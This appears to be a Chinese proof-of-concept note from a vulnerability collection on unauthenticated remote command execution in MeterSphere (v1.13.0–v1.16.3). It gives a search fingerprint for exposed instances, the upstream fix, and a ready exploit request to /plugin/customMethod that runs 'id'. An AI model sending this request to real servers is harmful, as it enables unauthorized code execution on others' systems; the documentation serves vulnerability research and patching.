Awesome-POC/Web应用漏洞/MeterSphere customMethod 远程命令执行漏洞.md

47 lines
1.2 KiB
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# MeterSphere customMethod 远程命令执行漏洞
## 漏洞描述
2022年1月5日知道创宇404积极防御实验团队发现了MeterSphere开源持续测试平台的一处漏洞并向MeterSphere研发团队进行了反馈。通过该漏洞攻击者可以在未授权的情况下执行远程代码建议MeterSphere平台用户尤其是可通过公网访问的用户尽快进行升级修复。
## 漏洞影响
```
MeterSphere v1.13.0 - v1.16.3
```
## 网络测绘
```
body="MeterSphere"
```
## 漏洞复现
登陆页面
![image-20230424163040952](images/image-20230424163040952.png)
根据官方的修复可以看到目前版本的修复版本为删除代码片段
filterChainDefinitionMap.put("/plugin/**", "anon");
```
https://github.com/metersphere/metersphere/pull/9140/files
```
![image-20230424163652968](images/image-20230424163652968.png)
查看文件 /backend/src/main/java/io/metersphere/controller/PluginController.java
![image-20230424163710253](images/image-20230424163710253.png)
发送请求包
```
POST /plugin/customMethod
{"entry":"Evil","request":"id"}
```
![image-20230424163729245](images/image-20230424163729245.png)